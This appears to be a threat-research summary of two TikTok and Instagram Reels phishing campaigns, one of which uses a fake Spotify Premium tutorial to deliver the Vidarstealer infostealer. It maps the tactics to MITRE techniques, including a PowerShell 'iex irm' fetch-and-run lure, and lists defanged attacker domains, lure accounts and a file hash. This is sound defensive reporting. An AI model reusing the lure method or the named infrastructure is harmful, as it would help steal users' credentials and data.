Threat Research

Phishing Attacks Leverage TikTok, Instagram Reels

Reversinglabs
Phishing Attacks Leverage TikTok, Instagram Reels
ReversingLabs documented two short-form video phishing campaigns on TikTok and Instagram Reels that lure users with promises of free premium software and then redirect them to attacker-controlled sites. One campaign delivers Vidarstealer through a fake Spotify Premium tutorial, while the other uses engagement bait and comment replies to push victims toward dubious download pages. #Vidarstealer #TikTok #InstagramReels #SpotifyPremium

Keypoints

  • ReversingLabs found two distinct social engineering campaigns using short-form videos as a phishing vector.
  • The campaigns primarily targeted users on TikTok and Instagram Reels.
  • One method used polished fake tutorials, while the other used casual “free premium” posts and comment bait to generate engagement.
  • Victims were redirected to secondary websites offering free software or premium features that were suspicious or malicious.
  • The fake Spotify Premium tutorial led to downloading build.exe, identified as Vidarstealer.
  • Vidarstealer is described as a malware-as-a-service infostealer that steals credentials, financial data, and tokens.
  • Researchers also observed takedown or inactivity for several associated domains, though the social media accounts and tactics could be rapidly recreated.

MITRE Techniques

  • [T1566 ] Phishing – Threat actors used short-form social media videos to lure users into visiting malicious sites and following harmful instructions (‘short-form videos on social media apps are currently being leveraged by threat actors as a phishing vector’).
  • [T1204 ] User Execution – Victims were encouraged to run PowerShell commands and download files themselves after trusting the tutorial (‘showing users step-by-step how to access Powershell… and what command to input’).
  • [T1059.001 ] PowerShell – The lure instructed users to open PowerShell and execute a command to fetch a script (‘how to access Powershell from the Windows menu’).
  • [T1105 ] Ingress Tool Transfer – The command was used to retrieve scripts or malware from a remote site (‘the iex irm command will download scripts present at the specified address’).
  • [T1566.002 ] Spearphishing Link – The videos and profile descriptions directed users to external domains hosting downloads or tutorials (‘drive viewers to a secondary website’).
  • [T1585 ] Establish Accounts – Attackers used multiple nearly identical social media accounts to spread the lure at scale (‘a myriad of almost identical accounts’).
  • [T1647 ] Acquire Infrastructure – Malicious domains were used as delivery points for downloads and survey redirections (‘sites, like pluginchad[.]xyz or maxapk[.]xyz’).

Indicators of Compromise

  • [File Hash] Vidarstealer sample – 03bbc4fa1fd784276da135ab62fef85aaddea66e6eb176d7e59c3398f818b153
  • [Domains] Malicious download and lure sites – pluginchad[.]xyz, maxapk[.]xyz, and 2 more domains
  • [Domains] Command-and-download / lure endpoint – msget[.]run, msget[.]run/spotify, and slmgr[.]sh
  • [Domains] Secondary lure site analyzed in sandbox – d4ug[.]site
  • [Social Media Accounts] TikTok lure accounts – tiktok[.]com/@windows.tips, tiktok[.]com/@windows.insight, and 3 more accounts
  • [Social Media Accounts] Instagram lure accounts – instagram[.]com/wtips404, instagram[.]com/wndwstips, and instagram[.]com/epemberton369
  • [File Name] Delivered executable – build.exe

Read more: https://www.reversinglabs.com/blog/social-media-attacks-phishing

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint